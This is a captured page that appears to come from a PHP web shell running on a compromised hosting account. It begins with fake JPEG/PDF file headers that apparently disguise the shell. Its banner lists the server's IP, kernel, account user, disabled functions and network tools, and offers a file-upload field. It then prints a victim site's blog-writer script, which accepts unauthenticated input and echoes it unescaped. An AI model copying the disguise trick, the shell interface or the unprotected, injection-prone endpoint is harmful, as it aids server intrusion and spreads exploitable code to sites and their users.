ÿØÿà JFIF ÿþ; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 82.197.83.129 / Your IP : 216.73.216.166 [ Web Server : LiteSpeed System : Linux us-bos-web1456.main-hosting.eu 4.18.0-553.40.1.lve.el8.x86_64 #1 SMP Wed Feb 12 18:54:57 UTC 2025 x86_64 User : u489457460 ( 489457460) PHP Version : 7.3.33 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail Domains : 2 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u489457460/domains/syoft.com/public_html/workathon.syoft.com/writer/ |
Upload File : |
<?php include 'utils.php'; $default_value = '<p> Objectively restore stand-alone markets rather than enterprise-wide products. Uniquely underwhelm best-of-breed mindshare through adaptive niches. Interactively leverage existing innovative e-services seamlessly parallel task open-source content without resource sucking technology. </p><p> Dramatically cultivate frictionless communities with enterprise-wide customer service. Dramatically simplify web-enabled growth strategies rather than integrated imperatives. Interactively leverage existing innovative e-services customer service. Intrinsicly impact web-enabled value vis-a-vis innovative customer service. Continually procrastinate efficient growth strategies for backend experiences. </p><div class="blog-details-info mt-5"> <h3 class="h5">Customer retention is key</h3> <ul class="content-list list-unstyled"> <li>Be involved in every step of the product design cycle from discovery and user acceptance testing.</li><li>Work with BAs, product managers and tech teams to lead the Product Design</li><li>Maintain quality of the design process and ensure that when designs are translated into code they accurately.</li><li>Accurately estimate design tickets during planning sessions.</li><li>Contribute to sketching sessions involving non-designersCreate, and pattern libraries.</li><li>Design pixel perfect responsive UI�s and understand that adopting common interface</li><li>Interface patterns is better for UX than reinventing the wheel</li></ul> <blockquote class="bg-white custom-shadow p-5 mt-5 rounded-custom border-4 border-primary border-top"> <p class="text-muted"> <i class="fas fa-quote-left me-2 text-primary"></i> Globally network long-term high-impact schemas vis-a-vis distinctive e-commerce cross-media infrastructures rather than ethical. Credibly visualize distinctive testing procedures without end-to-end ROI. Seamlessly brand cross-platform communities with backend markets. Assertively utilize business services through robust solutions. Rapidiously deliver cross-unit infrastructures rather than accurate metrics. <i class="fas fa-quote-right ms-2 text-primary"></i> </p></blockquote> </div><img src="assets/img/tab-feature-img-4.png" class="img-fluid mt-4 rounded-custom" alt="apply"/> <div class="job-details-info mt-5"> <h3 class="h5">Focus on increasing customer retention first</h3> <p> Appropriately fashion ubiquitous information without future-proof growth strategies. Interactively morph cutting-edge e-business before functional potentialities. Compellingly syndicate empowered communities via multimedia based schemas. Objectively productize granular materials whereas quality solutions. Collaboratively reinvent innovative paradigms and low-risk high-yield action items. </p><ul class="content-list list-unstyled"> <li>Interactively plagiarize covalent "outside the box" thinking vis-a-vis.</li><li>Holisticly communicate integrated channels via backend interfaces. Authoritatively.</li><li>Globally actualize effective processes through synergistic ROI. Interactively.</li></ul> </div><div class="blog-details-info mt-5"> <h3 class="h5">Skill & Experience</h3> <ul class="content-list list-unstyled"> <li>You have at least 3 years� experience working as a Product Designer.</li><li>You have experience using Sketch and InVision or Framer X</li><li>You have some previous experience working in an agile environment � Think two-week sprints.</li><li>You are familiar using Jira and Confluence in your workflow</li></ul> </div><img src="assets/img/tab-feature-img-2.png" class="img-fluid mt-5 rounded-custom" alt="apply"/> </div></div>'; if(isset($_REQUEST["post_edit_id"])){ $current_post = getPostDetail($_REQUEST["post_edit_id"]); } if(isset($_REQUEST["update"])){ $title = $_REQUEST["title"]; $desc = $_REQUEST["description"]; $short_desc = $_REQUEST["short_desc"]; $image = $_REQUEST["feature_image"]; $user_id = 1;//$_REQUEST["user_id"]; $category = $_REQUEST["category"]; $update_id = $_REQUEST["post_id"]; $is_published = updatePost($title,$desc,$short_desc,$image,$user_id,$category,$update_id); } else if(isset($_REQUEST["title"])){ $title = $_REQUEST["title"]; $desc = $_REQUEST["description"]; $short_desc = $_REQUEST["short_desc"]; $image = $_REQUEST["feature_image"]; $user_id = 1;//$_REQUEST["user_id"]; $category = $_REQUEST["category"]; $is_published = insertPost($title,$desc,$short_desc,$image,$user_id,$category); echo "Post is published now!"; } print_r($current_post); ?> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>Write the Post Detail</title> <!-- Latest compiled and minified CSS --> <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@3.3.7/dist/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous"> <!-- Optional theme --> <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@3.3.7/dist/css/bootstrap-theme.min.css" integrity="sha384-rHyoN1iRsVXV4nD0JutlnGaslCJuC7uwjduW9SVrLvRYooPp2bWYgmgJQIXwl/Sp" crossorigin="anonymous"> <!-- Latest compiled and minified JavaScript --> <script src="https://cdn.jsdelivr.net/npm/bootstrap@3.3.7/dist/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script> <script src="//cdn.ckeditor.com/4.16.1/standard/ckeditor.js"></script> </head> <body> <div class="container"> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-body"> <form action="" method="post"> <br /><br /> <label>Blog Title:</label> <input class="form-control" name="title" type="text" height="50px" width="400px" value="<?php if(isset($current_post)){echo $current_post["title"];}else{echo "";} ?>" /> <br /> <label>Short Description:</label> <textarea name="short_desc" class="form-control" value="<?php if(isset($current_post)){echo $current_post["short_desc"];}else{echo "";} ?>"></textarea><br /> <label>Description in HTML:</label> <textarea class="form-control" name="description" id="editor" rows="10" cols="80" value="<?php if(isset($current_post)){echo $current_post["desc"];}else{echo $default_value;} ?>"></textarea> <br /> <input class="form-control" name="feature_image" type="text" height="50px" width="400px" value="<?php if(isset($current_post)){echo $current_post["featured_image"];}else{echo "";} ?>" /> <br /> <select name="category" class="form-control"> <?php $categories = getCategories(); foreach ($categories as $category) { echo '<option value="'.$category["id"].'"'.$category["name"].'>'.$category["name"].'</option>'; } ?> </select><br /> <input name="post_id" value="<?php if(isset($current_post)){echo $current_post["id"];}else{echo "";} ?>" hidden/> <?php if(isset($current_post)){ echo '<button type="submit" name="update" value="Upload" class="btn btn-block mt-1"> Update</button>'; }else{ echo '<button type="submit" name="submit" value="Upload" class="btn btn-block mt-1"> Publish</button>'; } ?> </form> </div> </div> </div> </div> </div> <script> CKEDITOR.replace('editor'); </script> </body> </html>